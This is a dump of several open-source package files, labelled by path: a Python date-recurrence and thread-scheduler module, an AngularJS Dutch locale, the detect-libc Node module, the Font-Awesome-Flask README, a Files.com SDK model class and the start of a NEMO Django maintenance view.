while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(hours=frequency)
def time_from_str(timeofday):
atoms = timeofday.split(u":")
def pop_or_zero():
try:
return int(atoms.pop(0))
        except ValueError:
raise ValueError("The supplied time '%s' could not be parsed."
% timeofday)
except IndexError:
return 0
hour = pop_or_zero()
minute = pop_or_zero()
second = pop_or_zero()
return datetime.time(hour, minute, second)
def eachday(startDate, timeofday=None, endDate=None):
"""Yield the same time-of-day for each day. Defaults to midnight.
Yielded values are datetime.datetime objects.
For example:
eachday(datetime.date(2004, 5, 4), datetime.time(14, 3, 0))
yields the sequence: 2004-05-04 14:03:00, 2004-05-05 14:03:00,
2004-05-06 14:03:00, ...
timeofday may be a datetime.time, as in the above example, or it
may be a string, of the form "hour:min:sec". Seconds and minutes
may be omitted if their colon ":" separator is also omitted. So
the example above could be rewritten:
eachday(datetime.date(2004, 5, 4), "14:03")
"""
if timeofday is None:
timeofday = datetime.time(0)
    elif isinstance(timeofday, str):
timeofday = time_from_str(timeofday)
# If the timeofday is less than the time of startDate,
# don't include the startDate in the results.
try:
if timeofday < startDate.time():
startDate = sane_date(startDate.year, startDate.month,
startDate.day + 1)
except AttributeError:
# startDate is a datetime.date, and has no time() attribute
pass
startDate = datetime.datetime.combine(startDate, timeofday)
# Now that we've coerced our startDate to a datetime, we need to
# do the same thing to endDate so we can compare them.
if endDate and not hasattr(endDate, "time"):
endDate = datetime.datetime.combine(endDate, timeofday)
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(1)
def eachweekday(startDate, weekday, timeofday=None, endDate=None):
"""Yield the same time-of-day each week for the given day. The time-of-day
defaults to midnight.
Yielded values are datetime.datetime objects.
For example:
eachweekday(datetime.date(2006, 8, 10), 3, datetime.time(14, 3, 0))
    yields the sequence: 2006-08-10 14:03:00, 2006-08-17 14:03:00,
                         2006-08-24 14:03:00, ... (2006-08-10 is a Thursday,
                         i.e. weekday 3)
timeofday may be a datetime.time, as in the above example, or it
may be a string, of the form "hour:min:sec". Seconds and minutes
may be omitted if their colon ":" separator is also omitted. So
the example above could be rewritten:
        eachweekday(datetime.date(2006, 8, 10), 3, "14:03")
"""
if timeofday is None:
timeofday = datetime.time(0)
    elif isinstance(timeofday, str):
timeofday = time_from_str(timeofday)
# get the given start time or datetime.time(0,0)
startTime = getattr(startDate, 'time', datetime.time)()
if startDate.weekday() > weekday or startTime > timeofday:
offset = (7 + weekday) - startDate.weekday()
while offset > 6:
offset -= 7
while offset <= 0:
offset += 7
startDate += datetime.timedelta(offset)
startDate = datetime.datetime.combine(startDate, timeofday)
# Now that we've coerced our startDate to a datetime, we need to
# do the same thing to endDate so we can compare them.
if endDate and not hasattr(endDate, "time"):
endDate = datetime.datetime.combine(endDate, timeofday)
end = getattr(endDate, 'date', lambda: None)()
day_iter = eachweek(startDate.date(), weekday, end)
    startDate = datetime.datetime.combine(next(day_iter), timeofday)
while (endDate is None) or (startDate <= endDate):
yield startDate
        startDate = datetime.datetime.combine(next(day_iter), timeofday)
def days(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' days each time.
For example:
days(datetime.date(2004, 5, 4), 7)
yields the sequence: 2004-5-4, 2004-5-11, 2004-5-18, ...
"""
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(frequency)
def eachweek(startDate, weekday=0, endDate=None):
"""Yield the same day-of-the-week for each week. Defaults to Monday.
Yielded values are datetime.date objects.
Weekday follows the same days of the week as datetime.weekday().
For example:
mon, tue, wed, thu, fri, sat, sun = range(7)
eachweek(datetime.date(2004, 5, 4), thu)
yields the sequence: 2004-5-6, 2004-5-13, 2004-5-20, ...
If weekday is out of bounds (0-6), it will be brought in bounds.
"""
if hasattr(startDate, 'time'):
startDate = startDate.date()
weekday = int(weekday)
offset = (7 + weekday) - startDate.weekday()
while offset > 6:
offset -= 7
while offset < 0:
offset += 7
startDate += datetime.timedelta(offset)
return days(startDate, 7, endDate)
def weeks(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' weeks each time.
For example:
weeks(datetime.date(2004, 5, 4), 2)
yields the sequence: 2004-5-4, 2004-5-18, 2004-6-1, ...
"""
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate += datetime.timedelta(frequency * 7)
def eachmonth(startDate, day=1, endDate=None):
"""Yield the same day of each month. Defaults to the first day.
Yielded values are datetime.date objects.
If day is a positive number, return that date for each month,
starting with startDate. For example:
eachmonth(datetime.date(2004, 5, 4), 15)
yields the sequence: 2004-5-15, 2004-6-15, 2004-7-15, ...
If day is zero or negative, return the same date counting
backwards from the end of the month. For example:
eachmonth(datetime.date(2004, 5, 4), -5)
yields the sequence: 2004-5-26, 2004-6-25, 2004-7-26, ...
If day specifies a day which does not appear in every month,
then the closest valid date within that month will be used instead.
For example:
eachmonth(datetime.date(2004, 5, 4), 31)
yields the sequence: 2004-5-31, 2004-6-30, 2004-7-31, ...
If startDate is greater than what would otherwise be the first date
in the sequence, that first item is not yielded; instead, the next
item becomes the first item yielded.
If endDate is less than what would otherwise be the last date in the
sequence, that last item is not yielded, and the sequence ends.
"""
if hasattr(startDate, 'time'):
startDate = startDate.date()
day = int(day)
highzero = (day < 1)
index = 0
while True:
firstDate = sane_date(startDate.year, startDate.month + index, day, highzero)
if firstDate >= startDate:
break
index += 1
startDate = firstDate
while (endDate is None) or (startDate <= endDate):
yield startDate
startDate = sane_date(startDate.year, startDate.month + 1, day, highzero)
def months(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' months each time.
For example:
months(datetime.date(2004, 5, 4), 3)
yields the sequence: 2004-5-4, 2004-8-4, 2004-11-4, ...
If the specified startDate contains a day which does not appear
in every month, then the corresponding day from the next month
will be used instead.
For example:
months(datetime.date(2004, 5, 31), 3)
yields the sequence: 2004-5-31, 2004-8-31, 2004-12-1, ...
If the frequency parameter is negative, the sequence descends.
"""
day = startDate.day
month = startDate.month
year = startDate.year
while True:
if endDate is not None:
if frequency < 0:
if startDate < endDate: break
else:
if startDate > endDate: break
yield startDate
month += frequency
startDate = sane_date(year, month, day)
def eachyear(startDate, month=1, day=1, endDate=None):
"""Yield the same day of the year for each year. Defaults to 1/1.
Yielded values are datetime.date objects.
If day and month are positive numbers, return that day/month for each
year, starting with startDate. For example:
eachyear(datetime.date(2004, 5, 4), 8, 15)
yields the sequence: 2004-8-15, 2005-8-15, 2006-8-15, ...
If month is zero or negative, return the same date counting months
backwards from the end of the year. For example:
eachyear(datetime.date(2004, 5, 4), -2, 15)
yields the sequence: 2004-10-15, 2005-10-15, 2006-10-15, ...
If day is zero or negative, return the same date counting days
backwards from the end of the month. For example:
eachyear(datetime.date(2004, 5, 4), -2, -1)
yields the sequence: 2004-10-30, 2005-10-30, 2006-10-30, ...
If day specifies a day which does not appear in the given month,
then the corresponding day from the next month will be used instead.
For example:
eachyear(datetime.date(2004, 5, 4), 5, 31)
yields the sequence: 2004-6-1, 2005-6-1, 2006-6-1, ...
If startDate is greater than what would otherwise be the first date
in the sequence, that first item is not yielded; instead, the next
item becomes the first item yielded.
If endDate is less than what would otherwise be the last date in the
sequence, that last item is not yielded, and the sequence ends.
"""
if hasattr(startDate, 'time'):
startDate = startDate.date()
month = int(month)
day = int(day)
index = 0
while True:
curDate = sane_date(startDate.year + index, month, day, True)
if curDate >= startDate:
break
index += 1
while (endDate is None) or (curDate <= endDate):
yield curDate
index += 1
curDate = sane_date(startDate.year + index, month, day, True)
def years(startDate, frequency=1, endDate=None):
"""Yield a sequence of dates, adding 'frequency' years each time.
For example:
years(datetime.date(2004, 5, 4), 3)
yields the sequence: 2004-5-4, 2007-5-4, 2010-5-4, ...
If the specified startDate contains a day which does not appear
in every year (i.e. leap years), then the corresponding day from
the next month will be used instead.
For example:
years(datetime.date(2004, 2, 29), 3)
yields the sequence: 2004-2-29, 2007-3-1, 2010-3-1, ...
If the frequency parameter is negative, the sequence descends.
"""
day = startDate.day
month = startDate.month
year = startDate.year
while True:
if endDate is not None:
if frequency < 0:
if startDate < endDate: break
else:
if startDate > endDate: break
yield startDate
year += frequency
startDate = sane_date(year, month, day)
def byunits(startDate, whichUnit, frequency=1, endDate=None):
"""Dispatch to the appropriate unit handler.
This really just exists to help out Locale series.
"""
frequency = int(frequency)
unithandler = (seconds, minutes, hours, days, weeks, months, years)
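    # whichUnit indexes this tuple: 0=seconds, 1=minutes, 2=hours, 3=days,
    # 4=weeks, 5=months, 6=years; e.g. byunits(d, 5, 3) equals months(d, 3).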
return unithandler[whichUnit](startDate, frequency, endDate)
def singledate(startDate, year, month=1, day=1, endDate=None):
"""Yield a single datetime.date if y/m/d occurs between start and end."""
year = int(year)
month = int(month)
day = int(day)
curDate = sane_date(year, month, day)
if curDate < startDate:
        return  # raising StopIteration inside a generator is a RuntimeError (PEP 479)
if (endDate is None) or (curDate <= endDate):
yield curDate
class Locale(object):
"""Language-specific expression matching.
To use a language other than English with Recurrence objects,
either subclass Locale and override the "patterns" dictionary,
or write some other callable that takes a description string
and returns a recurrence function and its "inner" args.
"""
patterns = {byunits: [r"([0-9]+) sec",
r"([0-9]+) min",
r"([0-9]+) hour",
r"([0-9]+) day",
r"([0-9]+) week",
r"([0-9]+) month",
r"([0-9]+) year",
],
# \S is any non-whitespace character.
eachday: r"([\S]+) (?:every|each) day",
eachweekday: [# don't match "month"
r"([\S]+) (?:every|each) mon(?!th)",
r"([\S]+) (?:every|each) tue",
r"([\S]+) (?:every|each) wed",
r"([\S]+) (?:every|each) thu",
r"([\S]+) (?:every|each) fri",
r"([\S]+) (?:every|each) sat",
r"([\S]+) (?:every|each) sun",
],
eachweek: [r"mon", r"tue", r"wed", r"thu", r"fri", r"sat", r"sun"],
eachmonth: r"(-?\d+) (?:every|each) month",
# Lookbehind for a digit and separator so we don't
# screw up singledate, below.
eachyear: [r"^(dummy entry to line up indexing)$",
r"(?<!\d\d[/ \-])(?:jan(?:uary)?|0?1)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:febr?(?:uary)?|0?2)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:mar(?:ch)?|0?3)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:apr(?:il)?|0?4)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:may|0?5)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:june?|0?6)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:july?|0?7)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:aug(?:ust)?|0?8)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:sept?(?:ember)?|0?9)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:oct(?:ober)?|10)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:nov(?:ember)?|11)[/ \-]([0-9]+)",
r"(?<!\d\d[/ \-])(?:dec(?:ember)?|12)[/ \-]([0-9]+)",
],
# ISO format (relaxed: 1-digit month and day OK,
# slash or space OK)
singledate: r"(\d\d\d\d)[/ \-]([01]?\d)[/ \-]([0123]?\d)",
}
    def __init__(self):
        # Compile into an instance-level dict so that subclasses with
        # different patterns do not clobber each other's compiled regexes.
        self.regexes = {}
        for key, regSet in self.patterns.items():
if isinstance(regSet, list):
self.regexes[key] = [re.compile(x, re.IGNORECASE)
for x in regSet]
else:
self.regexes[key] = re.compile(regSet, re.IGNORECASE)
def __call__(self, description):
for rule, regSet in self.regexes.items():
if isinstance(regSet, list):
for index, regex in enumerate(regSet):
matches = regex.match(description)
if matches:
return rule, (index,) + matches.groups()
else:
matches = regSet.match(description)
if matches:
return rule, matches.groups()
raise ValueError(u"The supplied description ('%s') "
u"could not be parsed." % description)
localeEnglish = Locale()
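# Example of mapping a description to a rule (a usage sketch):
#
#   rule, args = localeEnglish("15 minutes")
#   # rule is byunits and args == (1, '15'): index 1 selects the "minutes"
#   # entry of byunits' unithandler tuple, '15' is the captured frequency.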
class Recurrence(object):
"""A recurrence pattern and its iterator.
The Recurrence class provides natural-language hooks for common recur
operations. The "description" parameter should be a set of keywords in
a natural language, which is then looked up in self.locale.regexes.
Usage:
import datetime, recur
firstDate = datetime.date(2004, 1, 7)
lastDate = datetime.date(2004, 2, 11)
for eachDate in recur.Recurrence(firstDate, "Saturday", lastDate):
            print(eachDate)
2004-01-10
2004-01-17
2004-01-24
2004-01-31
2004-02-07
"""
def __init__(self, startDate=None, description="", endDate=None,
locale=localeEnglish):
"""
If startDate is None (not supplied), then it will be set
to the current date and time.
Leading and trailing whitespace will be stripped from the
description parameter.
"""
if startDate is None:
startDate = datetime.datetime.now()
description = description.strip()
self.startDate = startDate
self.description = description
self.endDate = endDate
self.locale = locale
self.function, args = locale(description)
self.args = (startDate,) + args + (endDate,)
# Form an initial generator, if for no other reason than to test args early.
self.reset()
def reset(self):
try:
self.generator = self.function(*self.args)
        except TypeError as x:
x.args += self.args
raise
def __iter__(self):
self.reset()
return self
    def __next__(self):
        return next(self.generator)

    # Py2-style alias, kept because Worker.advance() below calls recurrence.next().
    next = __next__
deltazero = datetime.timedelta(0)
class Worker(object):
"""Perform work on a schedule.
You must override work(), which is called at each interval.
"""
def __init__(self, recurrence):
        if isinstance(recurrence, str):
if recurrence:
recurrence = Recurrence(None, recurrence)
else:
recurrence = None
self.recurrence = recurrence
self.createdate = datetime.datetime.now()
self.lastrun = None
self.nextrun = None
self.curthread = None
self.active = True
def interval(self, next):
"""Return a timedelta (next - now).
if next is None, return None.
If next < now, return datetime.timedelta(0).
"""
if next is None:
return None
# next can be either a datetime.datetime or a datetime.date;
# get the correct representation of "now" from either one.
now = getattr(next, 'now', getattr(next, 'today'))()
return max(next - now, deltazero)
def advance(self):
"""Advance self.recurrence and set self.nextrun.
This function ignores dates which are in the past.
If the recurrence series is exhausted, self.nextrun will be None.
"""
if not self.recurrence:
self.nextrun = None
return
try:
next = self.recurrence.next()
except StopIteration:
# The recurrence series was exhausted immediately.
self.nextrun = None
return
# next can be either a datetime.datetime or a datetime.date;
# get the correct representation of "now" from either one.
now = getattr(next, 'now', getattr(next, 'today'))()
while True:
if next >= now:
self.nextrun = next
break
try:
next = self.recurrence.next()
except StopIteration:
# The recurrence series was exhausted.
self.nextrun = None
break
def start(self, secs=0):
"""Call self.run in a new thread."""
if self.active:
self.curthread = threading.Timer(secs, self.run)
self.curthread.start()
def run(self):
"""Prepare for work."""
if self.active:
self.work()
self.lastrun = datetime.datetime.now()
def work(self):
"""Perform the actual work. Must be overridden."""
raise NotImplementedError
def stop(self):
"""Stop work."""
self.active = False
if self.curthread:
self.curthread.cancel()
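# A minimal Worker subclass (a sketch): work() is the only method that must
# be overridden; the schedule itself comes from the recurrence description.
class HeartbeatWorker(Worker):
    """Print a timestamp at each scheduled interval."""

    def work(self):
        print("beat at", datetime.datetime.now())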
class Scheduler(object):
"""Collection of Workers governed by a single scheduler thread.
paused: a boolean flag indicating whether or not each Worker's start()
method should be executed at each interval. Notice that, even if
paused is True, the scheduler thread will still cycle, but Workers
will not be run at each interval.
terminated: a boolean flag indicating whether or not the Worker should
continue to cycle. If terminated is True, recurring Workers will
not schedule new threads.
"""
def __init__(self, workers=None):
if workers is None:
workers = {}
self.workers = workers
self.curthread = None
self.paused = False
self.terminated = False
def start(self):
"""Start a new recurring thread for all workers.
This sets self.terminated to False, but doesn't set self.paused.
"""
# Set nextrun for all workers
for worker in self.workers.values():
worker.advance()
self.terminated = False
self._cycle()
def _cycle(self):
"""Start a new Timer for the next worker."""
if self.terminated:
return
ivs = []
for w in self.workers.values():
next = w.nextrun
if next is not None:
ivs.append((w.interval(next), w))
if ivs:
            # Sort on the interval only; Worker objects are not comparable,
            # so a plain tuple sort would raise TypeError on equal intervals.
            ivs.sort(key=lambda pair: pair[0])
            iv, nextworker = ivs[0]
            iv = iv.total_seconds()
nextworker.advance()
self.curthread = threading.Timer(iv, self.run, (nextworker,))
self.curthread.start()
def run(self, worker):
"""Run the worker, then cycle again."""
if not self.paused and not self.terminated:
worker.start()
self._cycle()
def stop(self):
self.terminated = True
if self.curthread:
self.curthread.cancel()
for w in self.workers.values():
            w.stop()
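# Wiring it together (a sketch, using the HeartbeatWorker example above):
if __name__ == "__main__":
    import time
    sched = Scheduler({"heartbeat": HeartbeatWorker("10 sec")})
    sched.start()
    try:
        time.sleep(35)  # let the heartbeat fire a few times
    finally:
        sched.stop()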
/Flask-Statics-Helper-1.0.0.tar.gz/Flask-Statics-Helper-1.0.0/flask_statics/static/angular/i18n/angular-locale_nl.js

'use strict';
angular.module("ngLocale", [], ["$provide", function($provide) {
var PLURAL_CATEGORY = {ZERO: "zero", ONE: "one", TWO: "two", FEW: "few", MANY: "many", OTHER: "other"};
function getDecimals(n) {
n = n + '';
var i = n.indexOf('.');
return (i == -1) ? 0 : n.length - i - 1;
}
function getVF(n, opt_precision) {
var v = opt_precision;
if (undefined === v) {
v = Math.min(getDecimals(n), 3);
}
var base = Math.pow(10, v);
var f = ((n * base) | 0) % base;
return {v: v, f: f};
}
$provide.value("$locale", {
"DATETIME_FORMATS": {
"AMPMS": [
"a.m.",
"p.m."
],
"DAY": [
"zondag",
"maandag",
"dinsdag",
"woensdag",
"donderdag",
"vrijdag",
"zaterdag"
],
"MONTH": [
"januari",
"februari",
"maart",
"april",
"mei",
"juni",
"juli",
"augustus",
"september",
"oktober",
"november",
"december"
],
"SHORTDAY": [
"zo",
"ma",
"di",
"wo",
"do",
"vr",
"za"
],
"SHORTMONTH": [
"jan.",
"feb.",
"mrt.",
"apr.",
"mei",
"jun.",
"jul.",
"aug.",
"sep.",
"okt.",
"nov.",
"dec."
],
"fullDate": "EEEE d MMMM y",
"longDate": "d MMMM y",
"medium": "d MMM y HH:mm:ss",
"mediumDate": "d MMM y",
"mediumTime": "HH:mm:ss",
"short": "dd-MM-yy HH:mm",
"shortDate": "dd-MM-yy",
"shortTime": "HH:mm"
},
"NUMBER_FORMATS": {
"CURRENCY_SYM": "\u20ac",
"DECIMAL_SEP": ",",
"GROUP_SEP": ".",
"PATTERNS": [
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 3,
"minFrac": 0,
"minInt": 1,
"negPre": "-",
"negSuf": "",
"posPre": "",
"posSuf": ""
},
{
"gSize": 3,
"lgSize": 3,
"maxFrac": 2,
"minFrac": 2,
"minInt": 1,
"negPre": "\u00a4\u00a0",
"negSuf": "-",
"posPre": "\u00a4\u00a0",
"posSuf": ""
}
]
},
"id": "nl",
"pluralCat": function(n, opt_precision) { var i = n | 0; var vf = getVF(n, opt_precision); if (i == 1 && vf.v == 0) { return PLURAL_CATEGORY.ONE; } return PLURAL_CATEGORY.OTHER;}
});
}]);
/MetaCalls-0.0.5-cp310-cp310-manylinux2014_x86_64.whl/metacalls/node_modules/detect-libc/lib/detect-libc.js

'use strict';
const childProcess = require('child_process');
const { isLinux, getReport } = require('./process');
const command = 'getconf GNU_LIBC_VERSION 2>&1 || true; ldd --version 2>&1 || true';
let commandOut = '';
const safeCommand = () => {
if (!commandOut) {
return new Promise((resolve) => {
childProcess.exec(command, (err, out) => {
commandOut = err ? ' ' : out;
resolve(commandOut);
});
});
}
return commandOut;
};
const safeCommandSync = () => {
if (!commandOut) {
try {
commandOut = childProcess.execSync(command, { encoding: 'utf8' });
} catch (_err) {
commandOut = ' ';
}
}
return commandOut;
};
/**
* A String constant containing the value `glibc`.
* @type {string}
* @public
*/
const GLIBC = 'glibc';
/**
* A String constant containing the value `musl`.
* @type {string}
* @public
*/
const MUSL = 'musl';
const isFileMusl = (f) => f.includes('libc.musl-') || f.includes('ld-musl-');
const familyFromReport = () => {
const report = getReport();
if (report.header && report.header.glibcVersionRuntime) {
return GLIBC;
}
if (Array.isArray(report.sharedObjects)) {
if (report.sharedObjects.some(isFileMusl)) {
return MUSL;
}
}
return null;
};
const familyFromCommand = (out) => {
const [getconf, ldd1] = out.split(/[\r\n]+/);
if (getconf && getconf.includes(GLIBC)) {
return GLIBC;
}
if (ldd1 && ldd1.includes(MUSL)) {
return MUSL;
}
return null;
};
/**
* Resolves with the libc family when it can be determined, `null` otherwise.
* @returns {Promise<?string>}
*/
const family = async () => {
let family = null;
if (isLinux()) {
family = familyFromReport();
if (!family) {
const out = await safeCommand();
family = familyFromCommand(out);
}
}
return family;
};
/**
* Returns the libc family when it can be determined, `null` otherwise.
* @returns {?string}
*/
const familySync = () => {
let family = null;
if (isLinux()) {
family = familyFromReport();
if (!family) {
const out = safeCommandSync();
family = familyFromCommand(out);
}
}
return family;
};
/**
* Resolves `true` only when the platform is Linux and the libc family is not `glibc`.
* @returns {Promise<boolean>}
*/
const isNonGlibcLinux = async () => isLinux() && await family() !== GLIBC;
/**
* Returns `true` only when the platform is Linux and the libc family is not `glibc`.
* @returns {boolean}
*/
const isNonGlibcLinuxSync = () => isLinux() && familySync() !== GLIBC;
const versionFromReport = () => {
const report = getReport();
if (report.header && report.header.glibcVersionRuntime) {
return report.header.glibcVersionRuntime;
}
return null;
};
const versionSuffix = (s) => s.trim().split(/\s+/)[1];
const versionFromCommand = (out) => {
const [getconf, ldd1, ldd2] = out.split(/[\r\n]+/);
if (getconf && getconf.includes(GLIBC)) {
return versionSuffix(getconf);
}
if (ldd1 && ldd2 && ldd1.includes(MUSL)) {
return versionSuffix(ldd2);
}
return null;
};
/**
* Resolves with the libc version when it can be determined, `null` otherwise.
* @returns {Promise<?string>}
*/
const version = async () => {
let version = null;
if (isLinux()) {
version = versionFromReport();
if (!version) {
const out = await safeCommand();
version = versionFromCommand(out);
}
}
return version;
};
/**
* Returns the libc version when it can be determined, `null` otherwise.
* @returns {?string}
*/
const versionSync = () => {
let version = null;
if (isLinux()) {
version = versionFromReport();
if (!version) {
const out = safeCommandSync();
version = versionFromCommand(out);
}
}
return version;
};
module.exports = {
GLIBC,
MUSL,
family,
familySync,
isNonGlibcLinux,
isNonGlibcLinuxSync,
version,
versionSync
};
/Font-Awesome-Flask-0.1.1.tar.gz/Font-Awesome-Flask-0.1.1/README.md

<!-- start docs-include-index -->
# Font-Awesome-Flask
![PyPI version](https://img.shields.io/pypi/v/Font-Awesome-Flask)
[PyPI](https://pypi.org/project/Font-Awesome-Flask/)
[pre-commit.ci status](https://results.pre-commit.ci/latest/github/sgraaf/font-awesome-flask/main)
[Documentation status](https://font-awesome-flask.readthedocs.io/en/latest/?badge=latest)
![License](https://img.shields.io/pypi/l/Font-Awesome-Flask)
Font-Awesome-Flask is an extension for [Flask](https://flask.palletsprojects.com/en/latest/) that adds support for [Font Awesome](https://fontawesome.com/) to your web application. It adds methods to load Font Awesome's resources (both `Web Fonts + CSS` and `SVG + JS` are supported) and render icons.
<!-- end docs-include-index -->
## Installation
<!-- start docs-include-installation -->
### From PyPI
Font-Awesome-Flask is available on [PyPI](https://pypi.org/project/Font-Awesome-Flask/). Install with `pip` or your package manager of choice:
```bash
pip install Font-Awesome-Flask
```
### From source
If you'd like, you can also install Font-Awesome-Flask from source (with [`flit`](https://flit.readthedocs.io/en/latest/)):
```bash
git clone https://github.com/sgraaf/font-awesome-flask.git
cd font-awesome-flask
python3 -m pip install flit
flit install
```
<!-- end docs-include-installation -->
## Documentation
Check out the [Font-Awesome-Flask documentation](https://font-awesome-flask.readthedocs.io/en/stable/) for the [User's Guide](https://font-awesome-flask.readthedocs.io/en/stable/usage.html) and [API Reference](https://font-awesome-flask.readthedocs.io/en/stable/api.html).
## Example
### Configuration
Font-Awesome-Flask can be configured via the [Flask configuration API](https://flask.palletsprojects.com/en/latest/config/), using the `config` attribute of the `Flask` object. These are the available configuration values along with their description:
| Configuration value | Default | Description |
| -------------------------- | ------- | ------------------------------------------------------------------ |
| `FONT_AWESOME_SERVE_LOCAL` | `False` | Whether to serve Font Awesome's resources locally or from the CDN. |
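
For example, to serve Font Awesome's resources locally rather than from the CDN, set the option on `app.config` before loading any resources:

```python
app.config["FONT_AWESOME_SERVE_LOCAL"] = True
```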
### Initialization
<!-- start docs-include-initialization -->
Initialize the extension with the Flask application normally...:
```python
from flask import Flask
from flask_font_awesome import FontAwesome
app = Flask(__name__)
font_awesome = FontAwesome(app)
```
... or using the [Application Factory](https://flask.palletsprojects.com/en/latest/patterns/appfactories/) pattern:
```python
from flask import Flask
from flask_font_awesome import FontAwesome
font_awesome = FontAwesome()
def create_app():
app = Flask(__name__)
font_awesome.init_app(app)
return app
```
<!-- end docs-include-initialization -->
### Loading resources
Font-Awesome-Flask provides three helper methods to load Font Awesome's resources: `font_awesome.load()`, `font_awesome.load_js()` and `font_awesome.load_css()`.
Font Awesome can be used either via [Web Fonts + CSS or via SVG + JS](https://fontawesome.com/docs/web/dig-deeper/webfont-vs-svg). Use the `load_css()` method for the former, and `load_js()` for the latter. You can also use the more general `load()`, which defaults to `SVG + JS`.
Whichever resource(s) you end up using, you can load them by including any of the `load()` methods in the head of your base template:
<!-- prettier-ignore -->
```html
<head>
...
{{ font_awesome.load_js() }}
...
</head>
<body>
...
</body>
```
### Rendering icons
Font-Awesome-Flask provides two ways of rendering icons: via the `font_awesome.render_icon()` and `font_awesome.render_stacked_icons()` methods...:
```python
{{font_awesome.render_icon("fas fa-house")}}
{{font_awesome.render_stacked_icons("fas fa-square", "fas fa-house")}}
```
... or via the [Jinja macros](https://jinja.palletsprojects.com/en/latest/templates/#macros) of the same names:
```
{% from 'font_awesome.html' import render_icon, render_stacked_icons %}
{{ render_icon('fas fa-house') }}
{{ render_stacked_icons('fas fa-square', 'fas fa-house') }}
```
/Files.com-1.0.1051-py3-none-any.whl/files_sdk/models/inbox_upload.py

from files_sdk.list_obj import ListObj
from files_sdk.exceptions import InvalidParameterError
class InboxUpload:
default_attributes = {
'inbox_registration': None, # InboxRegistration
'path': None, # string - Upload path This must be slash-delimited, but it must neither start nor end with a slash. Maximum of 5000 characters.
'created_at': None, # date-time - Upload date/time
}
def __init__(self, attributes=None, options=None):
if not isinstance(attributes, dict):
attributes = {}
if not isinstance(options, dict):
options = {}
self.set_attributes(attributes)
self.options = options
def set_attributes(self, attributes):
for (attribute, default_value) in InboxUpload.default_attributes.items():
setattr(self, attribute, attributes.get(attribute, default_value))
def get_attributes(self):
return {k: getattr(self, k, None) for k in InboxUpload.default_attributes if getattr(self, k, None) is not None}
# Parameters:
# cursor - string - Used for pagination. When a list request has more records available, cursors are provided in the response headers `X-Files-Cursor-Next` and `X-Files-Cursor-Prev`. Send one of those cursor value here to resume an existing list from the next available record. Note: many of our SDKs have iterator methods that will automatically handle cursor-based pagination.
# per_page - int64 - Number of records to show per page. (Max: 10,000, 1,000 or less is recommended).
# sort_by - object - If set, sort records by the specified field in either `asc` or `desc` direction (e.g. `sort_by[created_at]=desc`). Valid fields are `created_at`.
# filter - object - If set, return records where the specified field is equal to the supplied value. Valid fields are `created_at`.
# filter_gt - object - If set, return records where the specified field is greater than the supplied value. Valid fields are `created_at`.
# filter_gteq - object - If set, return records where the specified field is greater than or equal the supplied value. Valid fields are `created_at`.
# filter_lt - object - If set, return records where the specified field is less than the supplied value. Valid fields are `created_at`.
# filter_lteq - object - If set, return records where the specified field is less than or equal the supplied value. Valid fields are `created_at`.
# inbox_registration_id - int64 - InboxRegistration ID
# inbox_id - int64 - Inbox ID
def list(params = None, options = None):
if not isinstance(params, dict):
params = {}
if not isinstance(options, dict):
options = {}
if "cursor" in params and not isinstance(params["cursor"], str):
raise InvalidParameterError("Bad parameter: cursor must be an str")
if "per_page" in params and not isinstance(params["per_page"], int):
raise InvalidParameterError("Bad parameter: per_page must be an int")
if "sort_by" in params and not isinstance(params["sort_by"], dict):
raise InvalidParameterError("Bad parameter: sort_by must be an dict")
if "filter" in params and not isinstance(params["filter"], dict):
raise InvalidParameterError("Bad parameter: filter must be an dict")
if "filter_gt" in params and not isinstance(params["filter_gt"], dict):
raise InvalidParameterError("Bad parameter: filter_gt must be an dict")
if "filter_gteq" in params and not isinstance(params["filter_gteq"], dict):
raise InvalidParameterError("Bad parameter: filter_gteq must be an dict")
if "filter_lt" in params and not isinstance(params["filter_lt"], dict):
raise InvalidParameterError("Bad parameter: filter_lt must be an dict")
if "filter_lteq" in params and not isinstance(params["filter_lteq"], dict):
raise InvalidParameterError("Bad parameter: filter_lteq must be an dict")
if "inbox_registration_id" in params and not isinstance(params["inbox_registration_id"], int):
raise InvalidParameterError("Bad parameter: inbox_registration_id must be an int")
if "inbox_id" in params and not isinstance(params["inbox_id"], int):
raise InvalidParameterError("Bad parameter: inbox_id must be an int")
return ListObj(InboxUpload,"GET", "/inbox_uploads", params, options)
    def all(params = None, options = None):
        # The bare name `list` here would resolve to the builtin, not the
        # function above, and the result was never returned.
        return InboxUpload.list(params, options)
def new(*args, **kwargs):
    return InboxUpload(*args, **kwargs)
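# Usage sketch (authentication via set_api_key is an assumption about the
# wider files_sdk package; see its documentation):
#
#   import files_sdk
#   files_sdk.set_api_key("YOUR_API_KEY")
#   for upload in InboxUpload.list({"inbox_id": 123}):
#       print(upload.path, upload.created_at)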
/NEMO_CE-1.6.12-py3-none-any.whl/NEMO/views/maintenance.py

from itertools import chain
from django.db.models import Q
from django.shortcuts import get_object_or_404, render
from django.views.decorators.http import require_GET
from NEMO.decorators import staff_member_required
from NEMO.models import Task, TaskCategory, TaskStatus, User
from NEMO.utilities import as_timezone
@staff_member_required
@require_GET
def maintenance(request, sort_by=''):
user: User = request.user
pending_tasks = Task.objects.filter(cancelled=False, resolved=False)
if user.get_preferences().tool_task_notifications.exists():
# Limit tools to preferences + tools user is the owner of + tools user is a backup owner of.
limit_tools = set(user.get_preferences().tool_task_notifications.all())
limit_tools.update(user.primary_tool_owner.all())
limit_tools.update(user.superuser_for_tools.all())
